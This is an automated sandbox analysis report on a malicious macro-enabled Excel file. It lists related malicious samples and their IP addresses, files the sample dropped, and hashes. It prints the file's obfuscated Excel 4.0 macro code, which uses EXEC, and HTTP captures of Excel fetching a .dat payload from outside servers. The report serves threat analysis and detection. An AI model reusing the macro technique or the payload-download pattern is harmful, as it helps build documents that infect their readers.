                • 193.38.55.33
                SecuriteInfo.com.Trojan.GenericKD.45968072.21801.exeGet hashmaliciousBrowse
                • 193.38.55.33
                SecuriteInfo.com.W32.AIDetect.malware1.20068.exeGet hashmaliciousBrowse
                • 193.38.55.33
                SecuriteInfo.com.W32.AIDetect.malware1.5648.exeGet hashmaliciousBrowse
                • 193.38.55.33
                tYSf9q5AiJ.exeGet hashmaliciousBrowse
                • 193.38.55.33
                messg.jpg.exeGet hashmaliciousBrowse
                • 193.38.54.129
                3688975dcd3f7829cfe55f7dd46166e0d6bd46c842c16.exeGet hashmaliciousBrowse
                • 193.38.55.33
                cessentl1.dllGet hashmaliciousBrowse
                • 45.67.228.186
                figure.03.23.2021.docGet hashmaliciousBrowse
                • 188.119.113.170
                figure.03.23.2021.docGet hashmaliciousBrowse
                • 188.119.113.170
                figure.03.23.2021.docGet hashmaliciousBrowse
                • 188.119.113.170
                documenti-03.23.2021.docGet hashmaliciousBrowse
                • 188.119.113.170
                documenti-03.23.2021.docGet hashmaliciousBrowse
                • 188.119.113.170
                kOe2Vpp8gk.exeGet hashmaliciousBrowse
                • 193.38.55.33
                q9ovrPJ48M.exeGet hashmaliciousBrowse
                • 193.38.55.33
                7RR7FZkDOQ.exeGet hashmaliciousBrowse
                • 193.38.55.33
                DHUBRU61444453825_03222021.xlsmGet hashmaliciousBrowse
                • 188.127.224.35
                61444453825_03222021.xlsmGet hashmaliciousBrowse
                • 188.127.224.35
                9556305403-04022021.xlsmGet hashmaliciousBrowse
                • 188.127.249.217
                9556305403-04022021.xlsmGet hashmaliciousBrowse
                • 188.127.249.217
                9556305403-04022021.xlsmGet hashmaliciousBrowse
                • 188.127.249.217
                DEBT_1968116513_03182021.xlsmGet hashmaliciousBrowse
                • 188.127.231.55
                DEBT_1968116513_03182021.xlsmGet hashmaliciousBrowse
                • 188.127.231.55
                DEBT_1149018870_03182021.xlsmGet hashmaliciousBrowse
                • 188.127.231.180
                DEBT_1149018870_03182021.xlsmGet hashmaliciousBrowse
                • 188.127.231.180
                Claim50770662203292021.xlsmGet hashmaliciousBrowse
                • 188.127.254.159
                Claim206141819403292021.xlsmGet hashmaliciousBrowse
                • 188.127.254.159
                Claim50770662203292021.xlsmGet hashmaliciousBrowse
                • 188.127.254.159
                Claim206141819403292021.xlsmGet hashmaliciousBrowse
                • 188.127.254.159
                Claim50770662203292021.xlsmGet hashmaliciousBrowse
                • 188.127.254.159
                Claim206141819403292021.xlsmGet hashmaliciousBrowse
                • 188.127.254.159
                Claim92563680703292021.xlsmGet hashmaliciousBrowse
                • 188.127.254.159
                Claim170826527103292021.xlsmGet hashmaliciousBrowse
                • 188.127.254.159
                Claim113481509103292021.xlsmGet hashmaliciousBrowse
                • 188.127.254.159
                Claim92563680703292021.xlsmGet hashmaliciousBrowse
                • 188.127.254.159
                Claim67513454903292021.xlsmGet hashmaliciousBrowse
                • 188.127.254.159

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A4B9C4AC.jpeg
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 1386x1386, frames 3
                Category:dropped
                Size (bytes):171553
                Entropy (8bit):7.651426384659082
                Encrypted:false
                SSDEEP:3072:RXFYiB3kNT+2Jozo1UW8gOvlAsku0Gy3ZsY0OPlaK/LBd:RXFYiB3kNBozoR8gOvljFy3ZIOXP
                MD5:1BE35F6C74B488050049162605294C82
                SHA1:6788B12BD406903C82C3ED6FD46DD8E833612A74
                SHA-256:788C88EB21A724887B5258A8170157BD11FE6A78E0C2C71326E194B6BDF12AC9
                SHA-512:EC53901E929051B186070127AD6B05F1A8E6D25C8216187285AB07B78534DF12649204C81B0A9059ADBDF95AAA92CC3978B68DE60A0DB170EB5C66F74FC82895
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: ......JFIF.............C....................................................................C.......................................................................j.j.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..sM.6...j.M...]....<..U{{.....+.n.V...+.....z...;....C..E.......3/L.r3....J.]...[..z-Y...Zw.Lz..eY.!_7...i.S..W`..c.h..L.8\....h.G..K.n%-.y.m..}..i..i >q..in...@.._.u.^.).m.o.s.J...6.ZI.>zyV..._n.G......
                C:\Users\user\AppData\Local\Temp\F7EE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):188507
                Entropy (8bit):7.659367569027655
                Encrypted:false
                SSDEEP:3072:YFXFYiB3kNT+2Jozo1UW8gOvlAsku0Gy3ZsY0OPlaK/LBb1y:YFXFYiB3kNBozoR8gOvljFy3ZIOXpw
                MD5:3183FB5D6421CC1F110EA846C2C4FE02
                SHA1:73F72B131BEB08FDCEED26712608A5BB6D702F39
                SHA-256:5EF1C8E82EB7AABCFED7F5C1B4DF87773031C55AE1D20AE8EA5E9B0E76908689
                SHA-512:1F2AC153BDA5E7BBA260F5D2ED4C5D490F84709F7488E1F6A85AC95932402A862099F7BA8E680CCA10A9F7FDC5CF56D70CBECFF38A4FFD22A7DA49966DE77FD8
                Malicious:false
                Reputation:low
                Preview: ...n.0.E.......D'.....E....I?.&..k..a...;...5.K....{..H......"j.Zv..X.Nz.]..._..$...;h....,..?l.`E..[..>q...+......|.".m.x.r-:......K.R...[..J<.T.n....R;V}..Q-.!.-E"...#H.W+-Ay.hI...A(...5M.....R......#...tY8....Q..}%..,.`....r..*..^.}.wja...;..7a.^|c.......H....6.LSj.X!..ubi..v/..J$.r.....39...I...Q|O5r..w.T...|.c..O........0m...\..n':D.E.u..O....?..|.(........{...1...&.........1}.}@.."L.....]....4....u .t..<.\ .S...6/...........PK..........!..#|.....X.......[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Comission_1980420924_03172021.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Wed Apr 7 23:27:44 2021, atime=Wed Apr 7 23:27:44 2021, length=188507, window=hide
                Category:dropped
                Size (bytes):2228
                Entropy (8bit):4.53396131367286
                Encrypted:false
                SSDEEP:48:8I/XTFGqnOsNeOsZgQh2I/XTFGqnOsNeOsZgQ/:8I/XJGqLCZgQh2I/XJGqLCZgQ/
                MD5:283403B64400B152CB39FE9631EAE5FA
                SHA1:1506F69FBA1E7C39E1753278B945FCA86B17F918
                SHA-256:06209C94AF63A42B29BB21A88DF5F4794574FDA4DA44BDC5840BFF6E61337D62
                SHA-512:7796AC6116BB1D98452BFC25C049B4DA7226FACA864472151CB9E958484C6C2757A4AED089C42415F4D5F8DF6B2841D772912F181240F8DB672B4D7188763B69
                Malicious:false
                Reputation:low
                Preview: L..................F.... .......{..l....,......,..[............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.l....Rs. .COMISS~1.XLS..r.......Q.y.Q.y*...8.....................C.o.m.i.s.s.i.o.n._.1.9.8.0.4.2.0.9.2.4._.0.3.1.7.2.0.2.1...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\841618\Users.user\Desktop\Comission_1980420924_03172021.xlsm.9.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C.o.m.i.s.s.i.o.n._.1.9.8.0.4.2.0.9.2.4._.0.3.1.7.2.0.2.1...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Apr 7 23:27:44 2021, atime=Wed Apr 7 23:27:44 2021, length=12288, window=hide
                Category:dropped
                Size (bytes):867
                Entropy (8bit):4.483215340447989
                Encrypted:false
                SSDEEP:12:85Q2ELgXg/XAlCPCHaX2B8GB/0x5vX+WnicvbSubDtZ3YilMMEpxRljK1TdJP9TK:85py/XTm6GcvYepDv3qgrNru/
                MD5:D4652003C954E3E9E2EDA84FED50A8BD
                SHA1:FBB4FC9DB4E4F9489E482EE5143C8C9C081124EE
                SHA-256:62A82F438F91CA496440A4CF14E635455105101087FBC4F8B60A36399BF80A9B
                SHA-512:B156340D4FFD5A679A15A35DCD2008792E2E3B2E20CF588891854E24B9071450147B320CCF1EBDE0D22E1E2B30F6EFF4B14B95BF54ADEF9139CB4F26B5EC458F
                Malicious:false
                Reputation:low
                Preview: L..................F...........7G..l....,..l....,...0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Rw...Desktop.d......QK.X.Rw.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\841618\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......841618..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):142
                Entropy (8bit):4.567615869533502
                Encrypted:false
                SSDEEP:3:oyBVomxWtnM0TzkVbl+nM0TzkVblmxWtnM0TzkVblv:dje9TzkVbcTzkVbz9TzkVb1
                MD5:5689775EF36F265CCF27A9BAF089052B
                SHA1:81F675CAA034CB470D0815A91D6AD59E25EF83E8
                SHA-256:FE8FD49E33FDBC456FA7C1D19603A9652BFF3839E92EB7C096428A87628A1562
                SHA-512:AB28A99DB258F5D90A6D07F62BF7B0CD6EEDE323084ECA7830DCB2D9B929F6418490E302DD8A0240026766FDFB119FC07BD816872F0912BB7C6BE4E1B42FC67A
                Malicious:false
                Reputation:low
                Preview: Desktop.LNK=0..[misc]..Comission_1980420924_03172021.LNK=0..Comission_1980420924_03172021.LNK=0..[misc]..Comission_1980420924_03172021.LNK=0..
                C:\Users\user\Desktop\C8EE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):188507
                Entropy (8bit):7.659367569027655
                Encrypted:false
                SSDEEP:3072:YFXFYiB3kNT+2Jozo1UW8gOvlAsku0Gy3ZsY0OPlaK/LBb1y:YFXFYiB3kNBozoR8gOvljFy3ZIOXpw
                MD5:3183FB5D6421CC1F110EA846C2C4FE02
                SHA1:73F72B131BEB08FDCEED26712608A5BB6D702F39
                SHA-256:5EF1C8E82EB7AABCFED7F5C1B4DF87773031C55AE1D20AE8EA5E9B0E76908689
                SHA-512:1F2AC153BDA5E7BBA260F5D2ED4C5D490F84709F7488E1F6A85AC95932402A862099F7BA8E680CCA10A9F7FDC5CF56D70CBECFF38A4FFD22A7DA49966DE77FD8
                Malicious:false
                Reputation:low
                Preview: ...n.0.E.......D'.....E....I?.&..k..a...;...5.K....{..H......"j.Zv..X.Nz.]..._..$...;h....,..?l.`E..[..>q...+......|.".m.x.r-:......K.R...[..J<.T.n....R;V}..Q-.!.-E"...#H.W+-Ay.hI...A(...5M.....R......#...tY8....Q..}%..,.`....r..*..^.}.wja...;..7a.^|c.......H....6.LSj.X!..ubi..v/..J$.r.....39...I...Q|O5r..w.T...|.c..O........0m...\..n':D.E.u..O....?..|.(........{...1...&.........1}.}@.."L.....]....4....u .t..<.\ .S...6/...........PK..........!..#|.....X.......[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\Desktop\~$Comission_1980420924_03172021.xlsm
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):330
                Entropy (8bit):1.4377382811115937
                Encrypted:false
                SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                MD5:96114D75E30EBD26B572C1FC83D1D02E
                SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                Malicious:true
                Reputation:high, very likely benign file
                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                Static File Info

                General

                File type:Microsoft Excel 2007+
                Entropy (8bit):7.660562640081434
                TrID:
                • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                • ZIP compressed archive (8000/1) 16.67%
                File name:Comission_1980420924_03172021.xlsm
                File size:189036
                MD5:7c87c28b3c650992cca31f7728aa2cfd
                SHA1:e278ae31532f3f65297d8c97d21080321cd79e9f
                SHA256:c794d4aa56fd9e070e2a7ef2b18c08016da687eddb100350216cada8110074d9
                SHA512:4844ddff58adea9aeaed98893af851f849e9318c06cf440a0651b043ecfa00499dc3e08812efcf5fad955206d12f0f4e57ad953ecad728fbe0cf57bb1b4d88d7
                SSDEEP:3072:kXFYiB3kNT+2Jozo1UW8gOvlAsku0Gy3ZsY0OPlaK/LBt:kXFYiB3kNBozoR8gOvljFy3ZIOXr
                File Content Preview:PK..........!..#|.....X.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                File Icon

                Icon Hash:e4e2aa8aa4bcbcac

                Static OLE Info

                General

                Document Type:OpenXML
                Number of OLE Files:1

                OLE File "Comission_1980420924_03172021.xlsm"

                Indicators

                Has Summary Info:
                Application Name:
                Encrypted Document:
                Contains Word Document Stream:
                Contains Workbook/Book Stream:
                Contains PowerPoint Document Stream:
                Contains Visio Document Stream:
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:

                Macro 4.0 Code

                ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,http://,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                =COUNTBLANK(V201:V224)=COUNTBLANK(V201:V224)=EXEC(sheet1!AP264&sheet1!AP263&sheet1!AP265)=COUNTBLANK(V201:V224)=COUNTBLANK(V201:V224)"=COUNTBLANK(V201:V224)=COUNTBLANK(V201:V224)=EXEC(sheet1!AP264&sheet1!AP263&""1""&sheet1!AP265)=COUNTBLANK(V201:V224)=COUNTBLANK(V201:V224)""=COUNTBLANK(V201:V224)=COUNTBLANK(V201:V224)=EXEC(sheet1!AP264&sheet1!AP263&""2""&sheet1!AP265)=COUNTBLANK(V201:V224)=COUNTBLANK(V201:V224)"=GOTO(sheet1!AU279)

                Network Behavior

                Snort IDS Alerts

                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                04/07/21-17:28:31.289345TCP1201ATTACK-RESPONSES 403 Forbidden8049169188.119.112.114192.168.2.22
                04/07/21-17:28:31.544942TCP1201ATTACK-RESPONSES 403 Forbidden8049170185.82.219.75192.168.2.22

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Apr 7, 2021 17:27:48.927644968 CEST4916780192.168.2.22188.127.230.104
                Apr 7, 2021 17:27:51.943101883 CEST4916780192.168.2.22188.127.230.104
                Apr 7, 2021 17:27:57.949660063 CEST4916780192.168.2.22188.127.230.104
                Apr 7, 2021 17:28:09.964373112 CEST4916880192.168.2.22188.127.230.104
                Apr 7, 2021 17:28:12.973773956 CEST4916880192.168.2.22188.127.230.104
                Apr 7, 2021 17:28:18.980294943 CEST4916880192.168.2.22188.127.230.104
                Apr 7, 2021 17:28:31.042330980 CEST4916980192.168.2.22188.119.112.114
                Apr 7, 2021 17:28:31.068675041 CEST8049169188.119.112.114192.168.2.22
                Apr 7, 2021 17:28:31.068849087 CEST4916980192.168.2.22188.119.112.114
                Apr 7, 2021 17:28:31.069569111 CEST4916980192.168.2.22188.119.112.114
                Apr 7, 2021 17:28:31.096004009 CEST8049169188.119.112.114192.168.2.22
                Apr 7, 2021 17:28:31.289345026 CEST8049169188.119.112.114192.168.2.22
                Apr 7, 2021 17:28:31.289483070 CEST4916980192.168.2.22188.119.112.114
                Apr 7, 2021 17:28:31.308078051 CEST4917080192.168.2.22185.82.219.75
                Apr 7, 2021 17:28:31.350810051 CEST8049170185.82.219.75192.168.2.22
                Apr 7, 2021 17:28:31.350929022 CEST4917080192.168.2.22185.82.219.75
                Apr 7, 2021 17:28:31.352185965 CEST4917080192.168.2.22185.82.219.75
                Apr 7, 2021 17:28:31.394726992 CEST8049170185.82.219.75192.168.2.22
                Apr 7, 2021 17:28:31.544941902 CEST8049170185.82.219.75192.168.2.22
                Apr 7, 2021 17:28:31.545022011 CEST4917080192.168.2.22185.82.219.75
                Apr 7, 2021 17:29:36.324116945 CEST8049169188.119.112.114192.168.2.22
                Apr 7, 2021 17:29:36.324289083 CEST4916980192.168.2.22188.119.112.114
                Apr 7, 2021 17:29:36.576308012 CEST8049170185.82.219.75192.168.2.22
                Apr 7, 2021 17:29:36.576693058 CEST4917080192.168.2.22185.82.219.75
                Apr 7, 2021 17:29:48.790648937 CEST4917080192.168.2.22185.82.219.75
                Apr 7, 2021 17:29:48.790864944 CEST4916980192.168.2.22188.119.112.114
                Apr 7, 2021 17:29:48.817296028 CEST8049169188.119.112.114192.168.2.22
                Apr 7, 2021 17:29:48.833523035 CEST8049170185.82.219.75192.168.2.22

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Apr 7, 2021 17:28:31.557406902 CEST5219753192.168.2.228.8.8.8
                Apr 7, 2021 17:28:31.570193052 CEST53521978.8.8.8192.168.2.22
                Apr 7, 2021 17:28:31.581911087 CEST5309953192.168.2.228.8.8.8
                Apr 7, 2021 17:28:31.595172882 CEST53530998.8.8.8192.168.2.22

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Apr 7, 2021 17:28:31.557406902 CEST192.168.2.228.8.8.80x2c09Standard query (0)44293.7276049768.datA (IP address)IN (0x0001)
                Apr 7, 2021 17:28:31.581911087 CEST192.168.2.228.8.8.80xd8c3Standard query (0)44293.7276049768.datA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Apr 7, 2021 17:28:31.570193052 CEST8.8.8.8192.168.2.220x2c09Name error (3)44293.7276049768.datnonenoneA (IP address)IN (0x0001)
                Apr 7, 2021 17:28:31.595172882 CEST8.8.8.8192.168.2.220xd8c3Name error (3)44293.7276049768.datnonenoneA (IP address)IN (0x0001)

                HTTP Request Dependency Graph

                • 188.119.112.114
                • 185.82.219.75

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.2249169188.119.112.11480C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampkBytes transferredDirectionData
                Apr 7, 2021 17:28:31.069569111 CEST0OUTGET /44293.7276049768.dat HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 188.119.112.114
                Connection: Keep-Alive
                Apr 7, 2021 17:28:31.289345026 CEST1INHTTP/1.1 403 Forbidden
                Server: nginx
                Date: Wed, 07 Apr 2021 15:28:31 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: keep-alive
